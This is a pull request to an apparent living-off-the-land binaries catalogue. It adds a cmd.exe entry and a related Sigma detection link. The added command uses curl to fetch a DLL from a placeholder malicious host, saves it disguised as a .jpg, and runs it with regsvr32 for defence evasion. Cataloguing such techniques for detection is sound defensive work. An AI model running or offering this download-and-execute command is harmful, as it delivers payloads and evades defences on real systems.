### PR TITLE
Update Cmd.yml

### DIFF
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@@ -18,6 +18,13 @@ Commands:
     Privileges: User
     MitreID: T1059.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: cmd.exe /q /c curl -o C:/path/to/save/imbad.jpg -O http://malicious_item/bad.dll&&regsvr32 C:/path/to/save/imbad.jpg
+    Description: Leverage cmd.exe to run curl and grab a malicious file, and save it to a designated path, then execute said malicious file with another native binary
+    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
+    Category: Execution
+    Privileges: User
+    MitreID: T1059.003
+    OperatingSystem: Windows 10 Insider build 17063 or later, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\cmd.exe
   - Path: C:\Windows\SysWOW64\cmd.exe
@@ -25,13 +32,18 @@ Code_Sample:
 - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
  - IOC: cmd.exe executing files from alternate data streams.
  - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
 Resources:
   - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
+  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd
+  - Link: https://isc.sans.edu/diary/Keep+an+Eye+on+Command-Line+Browsers/25804
 Acknowledgement:
   - Person: r0lan
     Handle: '@yeyint_mth'
+  - Person: Daniel Gott
+    Handle: '@gott_cyber'
 ---


### PR DESCRIPTION
Added additional capability within cmd.exe to leverage curl to retrieve malicious payload, which is now native to Windows 10 Insider build version 17063 or later releases 